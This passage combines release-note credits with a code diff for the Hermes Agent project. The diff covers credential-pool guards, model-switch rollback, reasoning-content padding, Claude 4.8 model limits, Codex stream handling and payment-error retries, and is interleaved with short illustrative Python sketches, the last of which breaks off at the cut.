- @austinpickett — dashboard 401 reload-loop fix (the headline), `@nous-research/ui` bump, Nix `npmDepsHash` updates
- @benbarclay — Docker `--insecure` opt-in, MCP bare-command resolution, dashboard test repair
- @kshitijk4poor — `/yolo` session bypass, completed-turn memory context salvage, hindsight follow-up docs
- @nicoloboschi — hindsight `recall_types` observation default
- @BROCCOLO1D — arm64 PR build cache fix
- @r266-tech — `--no-supervise` reference docs
- @yangguangjin — probe stepdown safety (salvage of @yanghd's #33673)
- @devwdave — completed-turn memory context (credited via salvage)
- @andrewhosf — co-author
### Issue Reporters (the 401 loop)
- @routesmith ([#34206](https://github.com/NousResearch/hermes-agent/issues/34206))
- @beeaton ([#34202](https://github.com/NousResearch/hermes-agent/issues/34202))
---
**Full Changelog**: [v2026.5.28...v2026.5.29](https://github.com/NousResearch/hermes-agent/compare/v2026.5.28...v2026.5.29)
+2 -2
@@ -1,7 +1,7 @@
{
"id": "hermes-agent",
"name": "Hermes Agent",
-"version": "0.14.0",
+"version": "0.15.1",
"description": "Self-improving open-source AI agent by Nous Research with ACP editor integration, persistent memory, skills, and rich tool support.",
"repository": "https://github.com/NousResearch/hermes-agent",
"website": "https://hermes-agent.nousresearch.com/docs/user-guide/features/acp",
@@ -9,7 +9,7 @@
"license": "MIT",
"distribution": {
"uvx": {
-"package": "hermes-agent[acp]==0.14.0",
+"package": "hermes-agent[acp]==0.15.1",
"args": ["hermes-acp"]
}
}
+2
@@ -4,3 +4,5 @@ These modules contain pure utility functions and self-contained classes
that were previously embedded in the 3,600-line run_agent.py. Extracting
them makes run_agent.py focused on the AIAgent orchestrator class.
"""
from . import jiter_preload as _jiter_preload # noqa: F401
+14 -2
@@ -183,6 +183,7 @@ def init_agent(
prefill_messages: List[Dict[str, Any]] = None,
platform: str = None,
user_id: str = None,
user_id_alt: str = None,
user_name: str = None,
chat_id: str = None,
chat_name: str = None,
@@ -265,6 +266,7 @@ def init_agent(
agent.ephemeral_system_prompt = ephemeral_system_prompt
agent.platform = platform # "cli", "telegram", "discord", "whatsapp", etc.
agent._user_id = user_id # Platform user identifier (gateway sessions)
agent._user_id_alt = user_id_alt # Optional stable alternate platform identifier
agent._user_name = user_name
agent._chat_id = chat_id
agent._chat_name = chat_name
@@ -736,8 +738,8 @@ def init_agent(
client_kwargs["default_headers"] = _codex_cloudflare_headers(api_key)
elif "default_headers" not in client_kwargs:
# Fall back to profile.default_headers for providers that
-# declare custom headers (e.g. Vercel AI Gateway attribution,
-# Kimi User-Agent on non-kimi.com endpoints).
+# declare custom headers (e.g. Kimi User-Agent on non-kimi.com
+# endpoints).
try:
from providers import get_provider_profile as _gpf
_ph = _gpf(agent.provider)
@@ -1005,6 +1007,13 @@ def init_agent(
# Track conversation messages for session logging
agent._session_messages: List[Dict[str, Any]] = []
# Responses encrypted reasoning replay state. Some OpenAI-compatible
# routes accept GPT-5 Responses requests but later reject replayed
# encrypted reasoning blobs (HTTP 400 ``invalid_encrypted_content``).
# When that happens we disable replay for the rest of the session and
# fall back to stateless continuity. See
# agent/conversation_loop.py's invalid_encrypted_content retry branch.
agent._codex_reasoning_replay_enabled = True
agent._memory_write_origin = "assistant_tool"
agent._memory_write_context = "foreground"
@@ -1112,6 +1121,8 @@ def init_agent(
# Thread gateway user identity for per-user memory scoping
if agent._user_id:
_init_kwargs["user_id"] = agent._user_id
if agent._user_id_alt:
_init_kwargs["user_id_alt"] = agent._user_id_alt
if agent._user_name:
_init_kwargs["user_name"] = agent._user_name
if agent._chat_id:
@@ -1511,6 +1522,7 @@ def init_agent(
platform=agent.platform or "cli",
model=agent.model,
context_length=getattr(agent.context_compressor, "context_length", 0),
conversation_id=getattr(agent, "_gateway_session_key", None),
)
except Exception as _ce_err:
_ra().logger.debug("Context engine on_session_start: %s", _ce_err)
+168 -72
@@ -560,6 +560,24 @@ def recover_with_credential_pool(
if pool is None:
return False, has_retried_429
# Defensive guard: if a fallback provider is active and its provider name
# doesn't match the pool's provider, the pool belongs to the PRIMARY
# provider. Mutating it based on fallback errors would corrupt the
# primary's credential state (see #33088) and, via _swap_credential,
# overwrite the agent's base_url back to the primary's endpoint — every
# subsequent request then goes to the wrong host and 404s (see #33163).
# The pool should only act when the agent is still on the same provider
# that seeded the pool.
current_provider = (getattr(agent, "provider", "") or "").strip().lower()
pool_provider = (getattr(pool, "provider", "") or "").strip().lower()
if current_provider and pool_provider and current_provider != pool_provider:
_ra().logger.warning(
"Credential pool provider mismatch: pool=%s, agent=%s; "
"skipping pool mutation to avoid cross-provider contamination",
pool_provider, current_provider,
)
return False, has_retried_429
effective_reason = classified_reason
if effective_reason is None:
if status_code == 402:
@@ -1361,81 +1379,129 @@ def switch_model(agent, new_model, new_provider, api_key='', base_url='', api_mo
old_model = agent.model
old_provider = agent.provider
# Clear the per-config context_length override so the new model's
# actual context window is resolved via get_model_context_length()
# instead of inheriting the stale value from the previous model.
agent._config_context_length = None
# ── Swap core runtime fields ──
agent.model = new_model
agent.provider = new_provider
# Use new base_url when provided; only fall back to current when the
# new provider genuinely has no endpoint (e.g. native SDK providers).
# Without this guard the old provider's URL (e.g. Ollama's localhost
# address) would persist silently after switching to a cloud provider
# that returns an empty base_url string.
if base_url:
agent.base_url = base_url
agent.api_mode = api_mode
# Invalidate transport cache — new api_mode may need a different transport
if hasattr(agent, "_transport_cache"):
agent._transport_cache.clear()
if api_key:
agent.api_key = api_key
# ── Build new client ──
if api_mode == "anthropic_messages":
from agent.anthropic_adapter import (
build_anthropic_client,
resolve_anthropic_token,
_is_oauth_token,
# ── Snapshot all fields the swap+rebuild can mutate ──
# If the rebuild raises (bad API key, network error, build_anthropic_client
# failure, etc.) we restore these atomically so the agent isn't left with a
# new model/provider name paired with the OLD client — that mismatch causes
# HTTP 400s like "claude-sonnet-4-6 is not supported on openai-codex" on the
# next turn. Callers in cli.py / gateway/run.py / tui_gateway/server.py
# catch the re-raised exception and show the user a warning; without this
# rollback the warning is misleading because the swap partially succeeded.
# Use a sentinel so we can distinguish "attribute was unset" from
# "attribute was None" and skip the restore for genuinely-missing
# attributes (tests construct bare agents via __new__ without all fields).
_MISSING = object()
_snapshot = {
name: getattr(agent, name, _MISSING)
for name in (
"model",
"provider",
"base_url",
"api_mode",
"api_key",
"client",
"_anthropic_client",
"_anthropic_api_key",
"_anthropic_base_url",
"_is_anthropic_oauth",
"_config_context_length",
)
# Only fall back to ANTHROPIC_TOKEN when the provider is actually Anthropic.
# Other anthropic_messages providers (MiniMax, Alibaba, etc.) must use their own
# API key — falling back would send Anthropic credentials to third-party endpoints.
_is_native_anthropic = new_provider == "anthropic"
effective_key = (api_key or agent.api_key or resolve_anthropic_token() or "") if _is_native_anthropic else (api_key or agent.api_key or "")
}
# _client_kwargs is a dict — snapshot a shallow copy so mutating the
# live dict doesn't poison the rollback target.
_snapshot["_client_kwargs"] = dict(getattr(agent, "_client_kwargs", {}) or {})
# MiniMax OAuth: swap static string for a per-request callable token
# provider so the rebuilt client survives 15-min token expiry. See
# the matching block in agent_init.py for the full rationale.
if new_provider == "minimax-oauth" and isinstance(effective_key, str) and effective_key:
try:
# Clear the per-config context_length override so the new model's
# actual context window is resolved via get_model_context_length()
# instead of inheriting the stale value from the previous model.
agent._config_context_length = None
# ── Swap core runtime fields ──
agent.model = new_model
agent.provider = new_provider
# Use new base_url when provided; only fall back to current when the
# new provider genuinely has no endpoint (e.g. native SDK providers).
# Without this guard the old provider's URL (e.g. Ollama's localhost
# address) would persist silently after switching to a cloud provider
# that returns an empty base_url string.
if base_url:
agent.base_url = base_url
agent.api_mode = api_mode
# Invalidate transport cache — new api_mode may need a different transport
if hasattr(agent, "_transport_cache"):
agent._transport_cache.clear()
if api_key:
agent.api_key = api_key
# ── Build new client ──
if api_mode == "anthropic_messages":
from agent.anthropic_adapter import (
build_anthropic_client,
resolve_anthropic_token,
_is_oauth_token,
)
# Only fall back to ANTHROPIC_TOKEN when the provider is actually Anthropic.
# Other anthropic_messages providers (MiniMax, Alibaba, etc.) must use their own
# API key — falling back would send Anthropic credentials to third-party endpoints.
_is_native_anthropic = new_provider == "anthropic"
effective_key = (api_key or agent.api_key or resolve_anthropic_token() or "") if _is_native_anthropic else (api_key or agent.api_key or "")
# MiniMax OAuth: swap static string for a per-request callable token
# provider so the rebuilt client survives 15-min token expiry. See
# the matching block in agent_init.py for the full rationale.
if new_provider == "minimax-oauth" and isinstance(effective_key, str) and effective_key:
try:
from hermes_cli.auth import build_minimax_oauth_token_provider
effective_key = build_minimax_oauth_token_provider()
except Exception as _mm_exc: # noqa: BLE001
import logging as _logging
_logging.getLogger(__name__).warning(
"MiniMax OAuth: failed to install per-request token provider "
"on switch (%s); using static bearer.",
_mm_exc,
)
agent.api_key = effective_key
agent._anthropic_api_key = effective_key
agent._anthropic_base_url = base_url or getattr(agent, "_anthropic_base_url", None)
agent._anthropic_client = build_anthropic_client(
effective_key, agent._anthropic_base_url,
timeout=get_provider_request_timeout(agent.provider, agent.model),
)
agent._is_anthropic_oauth = _is_oauth_token(effective_key) if (_is_native_anthropic and isinstance(effective_key, str)) else False
agent.client = None
agent._client_kwargs = {}
else:
effective_key = api_key or agent.api_key
effective_base = base_url or agent.base_url
agent._client_kwargs = {
"api_key": effective_key,
"base_url": effective_base,
}
_sm_timeout = get_provider_request_timeout(agent.provider, agent.model)
if _sm_timeout is not None:
agent._client_kwargs["timeout"] = _sm_timeout
agent.client = agent._create_openai_client(
dict(agent._client_kwargs),
reason="switch_model",
shared=True,
)
except Exception:
# Rollback every mutated field to the pre-swap snapshot so the agent
# is left consistent (old model + old provider + old client) and the
# caller's exception handler can surface a meaningful warning. The
# exception is re-raised; cli.py / gateway/run.py / tui_gateway catch
# it and print "Agent swap failed; change applied to next session".
for _name, _value in _snapshot.items():
if _value is _MISSING:
# Attribute did not exist before the swap — don't fabricate it.
continue
try:
setattr(agent, _name, _value)
except Exception: # noqa: BLE001
pass
raise
# ── Re-evaluate prompt caching ──
agent._use_prompt_caching, agent._use_native_cache_layout = (
@@ -1928,6 +1994,36 @@ def copy_reasoning_content_for_api(agent, source_msg: dict, api_msg: dict) -> No
api_msg.pop("reasoning_content", None)
def reapply_reasoning_echo_for_provider(agent, api_messages: list) -> int:
"""Re-pad assistant turns with reasoning_content for the active provider.
``api_messages`` is built once, before the retry loop, while the *primary*
provider is active. If a mid-conversation fallback then switches to a
require-side provider (DeepSeek / Kimi / MiMo thinking mode), assistant
turns that were built when the prior provider did NOT need the echo-back go
out without ``reasoning_content`` and the new provider rejects them with
HTTP 400 ("The reasoning_content in the thinking mode must be passed back").
Calling this immediately before building the request kwargs re-applies the
pad against the *current* provider. It is idempotent and a no-op unless
``_needs_thinking_reasoning_pad()`` is True for the active provider, so it
is safe to call every iteration and covers every fallback path.
Returns the number of assistant turns that gained reasoning_content.
"""
if not agent._needs_thinking_reasoning_pad():
return 0
padded = 0
for api_msg in api_messages:
if api_msg.get("role") != "assistant":
continue
if api_msg.get("reasoning_content"):
continue
copy_reasoning_content_for_api(agent, api_msg, api_msg)
if api_msg.get("reasoning_content"):
padded += 1
return padded
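The idempotence described in the docstring can be illustrated with a stand-alone sketch. `FakeAgent` and `fake_copy_reasoning` are hypothetical stand-ins invented here; the real `copy_reasoning_content_for_api` is not reproduced, and it is only assumed to leave a non-empty `reasoning_content` on assistant turns.

```python
class FakeAgent:
    """Hypothetical stand-in for the real agent; only what the sketch needs."""

    def __init__(self, needs_pad: bool) -> None:
        self.needs_pad = needs_pad

    def _needs_thinking_reasoning_pad(self) -> bool:
        return self.needs_pad


def fake_copy_reasoning(agent, source_msg: dict, api_msg: dict) -> None:
    # Assumption: the real helper pads with some non-empty placeholder.
    api_msg["reasoning_content"] = source_msg.get("reasoning") or " "


def reapply_pad(agent, api_messages: list) -> int:
    """Same control flow as the function in the diff, using the fake helper."""
    if not agent._needs_thinking_reasoning_pad():
        return 0
    padded = 0
    for msg in api_messages:
        if msg.get("role") != "assistant" or msg.get("reasoning_content"):
            continue
        fake_copy_reasoning(agent, msg, msg)
        if msg.get("reasoning_content"):
            padded += 1
    return padded


messages = [
    {"role": "user", "content": "hi"},
    {"role": "assistant", "content": "hello"},
    {"role": "assistant", "content": "again", "reasoning_content": "kept"},
]
first = reapply_pad(FakeAgent(needs_pad=True), messages)   # pads one turn
second = reapply_pad(FakeAgent(needs_pad=True), messages)  # nothing left to pad
```

Calling it on every retry iteration is cheap because already-padded turns are skipped by the truthiness check.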
def _iter_pool_sockets(client: Any):
"""Yield raw sockets reachable from an OpenAI/httpx client pool.
+5 -3
@@ -77,16 +77,16 @@ ADAPTIVE_EFFORT_MAP = {
# xhigh as a distinct level between high and max; older adaptive-thinking
# models (4.6) reject it with a 400. Keep this substring list in sync with
# the Anthropic migration guide as new model families ship.
_XHIGH_EFFORT_SUBSTRINGS = ("4-7", "4.7")
_XHIGH_EFFORT_SUBSTRINGS = ("4-7", "4.7", "4-8", "4.8")
# Models where extended thinking is deprecated/removed (4.6+ behavior: adaptive
# is the only supported mode; 4.7 additionally forbids manual thinking entirely
# and drops temperature/top_p/top_k).
_ADAPTIVE_THINKING_SUBSTRINGS = ("4-6", "4.6", "4-7", "4.7")
_ADAPTIVE_THINKING_SUBSTRINGS = ("4-6", "4.6", "4-7", "4.7", "4-8", "4.8")
# Models where temperature/top_p/top_k return 400 if set to non-default values.
# This is the Opus 4.7 contract; future 4.x+ models are expected to follow it.
_NO_SAMPLING_PARAMS_SUBSTRINGS = ("4-7", "4.7")
_NO_SAMPLING_PARAMS_SUBSTRINGS = ("4-7", "4.7", "4-8", "4.8")
_FAST_MODE_SUPPORTED_SUBSTRINGS = ("opus-4-6", "opus-4.6")
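A minimal sketch of how substring tuples like these can gate per-model behaviour. The tuples are copied from the new side of the hunk; `_matches` and `describe_model` are hypothetical helpers for illustration, not functions from this module.

```python
_XHIGH_EFFORT_SUBSTRINGS = ("4-7", "4.7", "4-8", "4.8")
_ADAPTIVE_THINKING_SUBSTRINGS = ("4-6", "4.6", "4-7", "4.7", "4-8", "4.8")
_NO_SAMPLING_PARAMS_SUBSTRINGS = ("4-7", "4.7", "4-8", "4.8")


def _matches(model: str, substrings: tuple) -> bool:
    # Hypothetical helper: case-insensitive substring test on the model id.
    name = model.lower()
    return any(s in name for s in substrings)


def describe_model(model: str) -> dict:
    """Summarize which request-shaping rules would apply to a model id."""
    return {
        "xhigh_effort": _matches(model, _XHIGH_EFFORT_SUBSTRINGS),
        "adaptive_thinking": _matches(model, _ADAPTIVE_THINKING_SUBSTRINGS),
        "no_sampling_params": _matches(model, _NO_SAMPLING_PARAMS_SUBSTRINGS),
    }


opus_48 = describe_model("claude-opus-4-8")
opus_46 = describe_model("claude-opus-4-6")
```

Substring matching keeps the lists short, at the cost of needing an update whenever a new model family ships.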
# ── Max output token limits per Anthropic model ───────────────────────
@@ -94,6 +94,8 @@ _FAST_MODE_SUPPORTED_SUBSTRINGS = ("opus-4-6", "opus-4.6")
# max_tokens as a mandatory field. Previously we hardcoded 16384, which
# starves thinking-enabled models (thinking tokens count toward the limit).
_ANTHROPIC_OUTPUT_LIMITS = {
# Claude 4.8
"claude-opus-4-8": 128_000,
# Claude 4.7
"claude-opus-4-7": 128_000,
# Claude 4.6
+137 -63
@@ -269,7 +269,6 @@ _API_KEY_PROVIDER_AUX_MODELS_FALLBACK: Dict[str, str] = {
"minimax-oauth": "MiniMax-M2.7-highspeed",
"minimax-cn": "MiniMax-M2.7",
"anthropic": "claude-haiku-4-5-20251001",
"ai-gateway": "google/gemini-3-flash",
"opencode-zen": "gemini-3-flash",
"opencode-go": "glm-5",
"kilocode": "google/gemini-3-flash-preview",
@@ -384,15 +383,6 @@ def build_nvidia_nim_headers(base_url: str | None) -> dict:
return {}
# Vercel AI Gateway app attribution headers. HTTP-Referer maps to
# referrerUrl and X-Title maps to appName in the gateway's analytics.
from hermes_cli import __version__ as _HERMES_VERSION
_AI_GATEWAY_HEADERS = {
"HTTP-Referer": "https://hermes-agent.nousresearch.com",
"X-Title": "Hermes Agent",
"User-Agent": f"HermesAgent/{_HERMES_VERSION}",
}
# Nous Portal extra_body for product attribution.
# Callers should pass this as extra_body in chat.completions.create()
@@ -785,67 +775,60 @@ class _CodexCompletionsAdapter:
pass
try:
# Collect output items and text deltas during streaming —
# the Codex backend can return empty response.output from
# get_final_response() even when items were streamed.
collected_output_items: List[Any] = []
collected_text_deltas: List[str] = []
has_function_calls = False
if total_timeout:
timeout_timer = threading.Timer(float(total_timeout), _close_client_on_timeout)
timeout_timer.daemon = True
timeout_timer.start()
_check_cancelled()
with self._client.responses.stream(**resp_kwargs) as stream:
for _event in stream:
_check_cancelled()
_etype = getattr(_event, "type", "")
if _etype == "response.output_item.done":
_done = getattr(_event, "item", None)
if _done is not None:
collected_output_items.append(_done)
elif "output_text.delta" in _etype:
_delta = getattr(_event, "delta", "")
if _delta:
collected_text_deltas.append(_delta)
elif "function_call" in _etype:
has_function_calls = True
_check_cancelled()
final = stream.get_final_response()
# Backfill empty output from collected stream events
_output = getattr(final, "output", None)
if isinstance(_output, list) and not _output:
if collected_output_items:
final.output = list(collected_output_items)
logger.debug(
"Codex auxiliary: backfilled %d output items from stream events",
len(collected_output_items),
)
elif collected_text_deltas and not has_function_calls:
# Only synthesize text when no tool calls were streamed —
# a function_call response with incidental text should not
# be collapsed into a plain-text message.
assembled = "".join(collected_text_deltas)
final.output = [SimpleNamespace(
type="message", role="assistant", status="completed",
content=[SimpleNamespace(type="output_text", text=assembled)],
)]
logger.debug(
"Codex auxiliary: synthesized from %d deltas (%d chars)",
len(collected_text_deltas), len(assembled),
)
# Event-driven Responses streaming via the low-level
# ``responses.create(stream=True)`` path. The high-level
# ``responses.stream(...)`` helper does post-hoc typed
# reconstruction from ``response.completed.response.output``,
# which the chatgpt.com Codex backend has been observed to
# return as ``null`` (gpt-5.5, May 2026) — that crashes the SDK
# with ``TypeError: 'NoneType' object is not iterable``.
# Consuming raw events and assembling the final response
# ourselves from ``response.output_item.done`` makes us
# structurally immune to that drift.
from agent.codex_runtime import _consume_codex_event_stream
stream_kwargs = dict(resp_kwargs)
stream_kwargs["stream"] = True
def _on_each_event(_event: Any) -> None:
# Re-check timeout/cancellation per event, matching the
# cadence the old in-line ``_check_cancelled()`` used.
_check_cancelled()
event_stream = self._client.responses.create(**stream_kwargs)
try:
final = _consume_codex_event_stream(
event_stream,
model=resp_kwargs.get("model"),
on_event=_on_each_event,
)
finally:
close_fn = getattr(event_stream, "close", None)
if callable(close_fn):
try:
close_fn()
except Exception:
pass
if final is None:
raise RuntimeError("Codex auxiliary Responses stream did not return a final response")
# Extract text and tool calls from the Responses output.
# Items may be SDK objects (attrs) or dicts (raw/fallback paths),
# so use a helper that handles both shapes.
# Items may be SimpleNamespace (raw-event path) or dicts
# (some legacy fallback paths), so handle both shapes.
def _item_get(obj: Any, key: str, default: Any = None) -> Any:
val = getattr(obj, key, None)
if val is None and isinstance(obj, dict):
val = obj.get(key, default)
return val if val is not None else default
for item in getattr(final, "output", []):
for item in (getattr(final, "output", None) or []):
item_type = _item_get(item, "type")
if item_type == "message":
for part in (_item_get(item, "content") or []):
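The raw-event approach described in the comment above can be sketched roughly as follows. This is not the body of `_consume_codex_event_stream`, which is not shown in this diff; `assemble_final_response` is a hypothetical name, and the events are modelled as plain `SimpleNamespace` objects.

```python
from types import SimpleNamespace
from typing import Any, Callable, Iterable, List, Optional


def assemble_final_response(
    events: Iterable[Any],
    on_event: Optional[Callable[[Any], None]] = None,
) -> Optional[Any]:
    """Build a final response from raw stream events (illustrative only)."""
    output_items: List[Any] = []
    completed = None
    for event in events:
        if on_event is not None:
            on_event(event)  # e.g. a cancellation / timeout check
        etype = getattr(event, "type", "")
        if etype == "response.output_item.done":
            item = getattr(event, "item", None)
            if item is not None:
                output_items.append(item)
        elif etype == "response.completed":
            completed = getattr(event, "response", None)
    if completed is None:
        return None
    # The backend may report output as None; trust the streamed items instead.
    if not getattr(completed, "output", None):
        completed.output = output_items
    return completed


seen: List[str] = []
stream = [
    SimpleNamespace(type="response.output_item.done",
                    item=SimpleNamespace(type="message")),
    SimpleNamespace(type="response.completed",
                    response=SimpleNamespace(output=None)),
]
final = assemble_final_response(stream, on_event=lambda e: seen.append(e.type))
```

Because the output list is rebuilt from `response.output_item.done` events, a null `output` on the completed event no longer matters.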
@@ -865,9 +848,12 @@ class _CodexCompletionsAdapter:
resp_usage = getattr(final, "usage", None)
if resp_usage:
usage = SimpleNamespace(
prompt_tokens=getattr(resp_usage, "input_tokens", 0),
completion_tokens=getattr(resp_usage, "output_tokens", 0),
total_tokens=getattr(resp_usage, "total_tokens", 0),
prompt_tokens=getattr(resp_usage, "input_tokens", 0)
or (resp_usage.get("input_tokens", 0) if isinstance(resp_usage, dict) else 0),
completion_tokens=getattr(resp_usage, "output_tokens", 0)
or (resp_usage.get("output_tokens", 0) if isinstance(resp_usage, dict) else 0),
total_tokens=getattr(resp_usage, "total_tokens", 0)
or (resp_usage.get("total_tokens", 0) if isinstance(resp_usage, dict) else 0),
)
except Exception as exc:
if timed_out.is_set():
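The attribute-or-dict fallback used for the usage fields in this hunk can be factored into one helper. `read_usage_field` is a hypothetical name, shown only to make the dual-shape handling explicit.

```python
from types import SimpleNamespace
from typing import Any


def read_usage_field(usage: Any, name: str) -> int:
    """Read a token count from an SDK-style object or a plain dict."""
    value = getattr(usage, name, 0)
    if not value and isinstance(usage, dict):
        value = usage.get(name, 0)
    return value or 0


from_object = read_usage_field(SimpleNamespace(input_tokens=7), "input_tokens")
from_dict = read_usage_field({"output_tokens": 3}, "output_tokens")
from_missing = read_usage_field(None, "total_tokens")
```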
@@ -2258,11 +2244,15 @@ def _is_payment_error(exc: Exception) -> bool:
# but sometimes wrap them in 429 or other codes.
# Daily quota exhaustion from Bedrock, Vertex AI, and similar providers
# uses different language but is semantically identical to credit exhaustion.
if status in {402, 429, None}:
if status in {402, 404, 429, None}:
if any(kw in err_lower for kw in (
"credits", "insufficient funds",
"can only afford", "billing",
"payment required",
"out of funds", "run out of funds",
"balance_depleted", "no usable credits",
"model_not_supported_on_free_tier",
"not available on the free tier",
# Daily / monthly / weekly quota exhaustion keywords
"quota exceeded", "quota_exceeded",
"too many tokens per day", "daily limit",
@@ -2274,6 +2264,18 @@ def _is_payment_error(exc: Exception) -> bool:
return False
def _nous_portal_account_has_fresh_paid_access() -> bool:
"""Return True only when the fresh Nous account API says paid access is allowed."""
try:
from hermes_cli.nous_account import get_nous_portal_account_info
account_info = get_nous_portal_account_info(force_fresh=True)
return account_info.paid_service_access is True
except Exception as exc:
logger.debug("Auxiliary Nous paid-entitlement refresh check failed: %s", exc)
return False
def _is_rate_limit_error(exc: Exception) -> bool:
"""Detect rate-limit errors that warrant provider fallback.
@@ -2302,6 +2304,10 @@ def _is_rate_limit_error(exc: Exception) -> bool:
if not any(kw in err_lower for kw in (
"credits", "insufficient funds", "billing",
"payment required", "can only afford",
"out of funds", "run out of funds",
"balance_depleted", "no usable credits",
"model_not_supported_on_free_tier",
"not available on the free tier",
)):
return True
return False
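The keyword branch shared by the two classifiers above can be approximated as below. This sketch covers only the billing keywords visible in this diff (the quota keywords are omitted), and `looks_like_payment_error` is a hypothetical name rather than the real `_is_payment_error`.

```python
from typing import Optional

_BILLING_KEYWORDS = (
    "credits", "insufficient funds", "can only afford", "billing",
    "payment required", "out of funds", "run out of funds",
    "balance_depleted", "no usable credits",
    "model_not_supported_on_free_tier", "not available on the free tier",
)


def looks_like_payment_error(status: Optional[int], message: str) -> bool:
    """True when the status is one the diff inspects and a keyword matches."""
    if status not in {402, 404, 429, None}:
        return False
    text = message.lower()
    return any(kw in text for kw in _BILLING_KEYWORDS)


free_tier = looks_like_payment_error(404, "model_not_supported_on_free_tier")
server_error = looks_like_payment_error(500, "billing backend unavailable")
plain_429 = looks_like_payment_error(429, "slow down")
```

Adding 404 to the inspected statuses matters because free-tier rejections can arrive as "not found" rather than 402.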
@@ -3613,8 +3619,7 @@ def resolve_provider_client(
else:
# Fall back to profile.default_headers for providers that declare
# client-level attribution headers on their profile (e.g. GMI
# User-Agent for traffic identification, Vercel AI Gateway
# Referer/Title for analytics).
# User-Agent for traffic identification).
try:
from providers import get_provider_profile as _gpf_main
_ph_main = _gpf_main(provider)
@@ -4952,6 +4957,41 @@ def call_llm(
resolved_provider == "nous"
or base_url_host_matches(_base_info, "inference-api.nousresearch.com")
)
if (
_is_payment_error(first_err)
and client_is_nous
and _nous_portal_account_has_fresh_paid_access()
):
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
model=final_model,
async_mode=False,
base_url=resolved_base_url,
api_key=resolved_api_key,
api_mode=resolved_api_mode,
main_runtime=main_runtime,
is_vision=(task == "vision"),
)
if refreshed_client is not None:
logger.info(
"Auxiliary %s: refreshed Nous runtime credentials after paid account check, retrying",
task or "call",
)
if refreshed_model and refreshed_model != kwargs.get("model"):
kwargs["model"] = refreshed_model
try:
return _validate_llm_response(
refreshed_client.chat.completions.create(**kwargs), task)
except Exception as retry_err:
if not (
_is_auth_error(retry_err)
or _is_payment_error(retry_err)
or _is_connection_error(retry_err)
or _is_rate_limit_error(retry_err)
):
raise
first_err = retry_err
if _is_auth_error(first_err) and client_is_nous:
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
@@ -5354,6 +5394,40 @@ async def async_call_llm(
resolved_provider == "nous"
or base_url_host_matches(_client_base, "inference-api.nousresearch.com")
)
if (
_is_payment_error(first_err)
and client_is_nous
and _nous_portal_account_has_fresh_paid_access()
):
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
model=final_model,
async_mode=True,
base_url=resolved_base_url,
api_key=resolved_api_key,
api_mode=resolved_api_mode,
is_vision=(task == "vision"),
)
if refreshed_client is not None:
logger.info(
"Auxiliary %s (async): refreshed Nous runtime credentials after paid account check, retrying",
task or "call",
)
if refreshed_model and refreshed_model != kwargs.get("model"):
kwargs["model"] = refreshed_model
try:
return _validate_llm_response(
await refreshed_client.chat.completions.create(**kwargs), task)
except Exception as retry_err:
if not (
_is_auth_error(retry_err)
or _is_payment_error(retry_err)
or _is_connection_error(retry_err)
or _is_rate_limit_error(retry_err)
):
raise
first_err = retry_err
if _is_auth_error(first_err) and client_is_nous:
refreshed_client, refreshed_model = _refresh_nous_auxiliary_client(
cache_provider=resolved_provider or "nous",
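The paid-entitlement retry added to both `call_llm` and `async_call_llm` follows one pattern, sketched here in synchronous form. All callables are injected placeholders, and `retry_after_paid_check` is a hypothetical name; the real code calls `_refresh_nous_auxiliary_client` and the `_is_*_error` helpers directly.

```python
from typing import Any, Callable, Optional, Tuple


def retry_after_paid_check(
    first_err: Exception,
    *,
    is_payment_error: Callable[[Exception], bool],
    has_fresh_paid_access: Callable[[], bool],
    refresh_client: Callable[[], Optional[Any]],
    call: Callable[[Any], Any],
    is_recoverable: Callable[[Exception], bool],
) -> Tuple[Optional[Any], Optional[Exception]]:
    """Return (result, None) on success, or (None, error_to_keep_handling)."""
    if not (is_payment_error(first_err) and has_fresh_paid_access()):
        return None, first_err
    client = refresh_client()
    if client is None:
        return None, first_err
    try:
        return call(client), None
    except Exception as retry_err:
        # Unknown failures propagate; recoverable ones fall through to the
        # later auth / fallback handling with the newer error.
        if not is_recoverable(retry_err):
            raise
        return None, retry_err


boom = RuntimeError("payment required")
ok = retry_after_paid_check(
    boom,
    is_payment_error=lambda e: True,
    has_fresh_paid_access=lambda: True,
    refresh_client=lambda: "client",
    call=lambda c: f"ok:{c}",
    is_recoverable=lambda e: True,
)
```

The fresh account check guards the retry so that a genuinely unpaid account does not trigger a pointless credential refresh.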
+5 -1
@@ -483,6 +483,11 @@ def _run_review_in_thread(
finally:
clear_thread_tool_whitelist()
# Snapshot review actions before teardown. close() is allowed to
# clean per-session state, but the user-visible self-improvement
# summary still needs the completed review agent's tool results.
review_messages = list(getattr(review_agent, "_session_messages", []))
# Tear down memory providers while stdout is still
# redirected so background thread teardown (Honcho flush,
# Hindsight sync, etc.) stays silent. The finally block
@@ -495,7 +500,6 @@ def _run_review_in_thread(
review_agent.close()
except Exception:
pass
review_messages = list(getattr(review_agent, "_session_messages", []))
review_agent = None
# Scan the review agent's messages for successful tool actions
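Why the snapshot has to move ahead of `close()` can be shown with a toy agent. `FakeReviewAgent` is hypothetical, and the assumption that `close()` clears `_session_messages` is only what the new comment says teardown is allowed to do.

```python
class FakeReviewAgent:
    """Hypothetical agent whose close() wipes per-session state."""

    def __init__(self) -> None:
        self._session_messages = [{"role": "tool", "content": "saved memory"}]

    def close(self) -> None:
        self._session_messages.clear()


agent = FakeReviewAgent()
# Snapshot first: list() copies the references before teardown runs.
snapshot = list(getattr(agent, "_session_messages", []))
agent.close()
# Reading after close() sees the emptied list.
late_read = list(getattr(agent, "_session_messages", []))
```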
+183 -27
@@ -129,6 +129,24 @@ def estimate_request_context_tokens(api_payload: Any) -> int:
return _chars(api_payload) // 4
def _is_openai_codex_backend(agent) -> bool:
base_url_lower = str(getattr(agent, "_base_url_lower", "") or "")
base_url_hostname = str(getattr(agent, "_base_url_hostname", "") or "")
return (
getattr(agent, "provider", None) == "openai-codex"
or (
base_url_hostname == "chatgpt.com"
and "/backend-api/codex" in base_url_lower
)
)
def _env_float(name: str, default: float) -> float:
try:
return float(os.getenv(name, str(default)))
except (TypeError, ValueError):
return default
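A short usage sketch for `_env_float`, repeating the helper from this hunk so the block runs on its own. The environment variable name is the one used later in the diff; the values are made up.

```python
import os


def _env_float(name: str, default: float) -> float:
    try:
        return float(os.getenv(name, str(default)))
    except (TypeError, ValueError):
        return default


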